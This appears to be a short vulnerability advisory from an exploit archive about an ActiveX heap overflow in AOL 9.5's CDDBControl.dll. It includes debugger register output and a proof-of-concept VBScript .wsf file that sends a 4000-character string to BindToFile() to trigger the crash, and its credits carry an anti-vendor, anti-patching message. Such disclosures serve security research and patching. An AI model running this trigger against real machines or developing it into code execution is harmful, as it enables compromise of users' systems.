Product:
AOL 9.5
Vulnerability:
ActiveX Heap Overflow
Discussion:
Vulnerability is in Activex Control ("CDDBControl.dll")
Sending a long string to BindToFile() , triggering the vulnerability.
Successful exploits allow remote attackers to execute arbitrary code.
Debugger Results:
(fd0.1274): Access violation - code c0000005 (!!! second chance !!!)
eax=7efefefe ebx=00000000 ecx=0020d7c0 edx=41414141
esi=03465df0 edi=02b82000 eip=10033011 esp=0020cdac
ebp=0020ed20 iopl=0 nv up ei pl zr na pe nc
Product:
AOL 9.5
Vulnerability:
ActiveX - Heap Overflow
Discussion:
Vulnerability is in Activex Control ("CDDBControl.dll")
Sending a string to BindToFile() , triggering the vulnerability.
Successful exploitation allow remote attackers to execute arbitrary code.
Credits:
Celil 'karak0rsan' Unuver and murderkey
from Hellcode Research
tcc.hellcode.net
forum.hellcode.net
L4stW0rdZ: "hi francis, do you think we forget you ??? ofcourse not, dont wait patch, dont support vendors
and security industry ...." - mkey
---------------
PoC .wsf script:
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F' id='target' />
<script language='vbscript'>
arg1=String(4000, "A")
arg2=1
target.BindToFile arg1 ,arg2
</script>
</job>
</package>
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum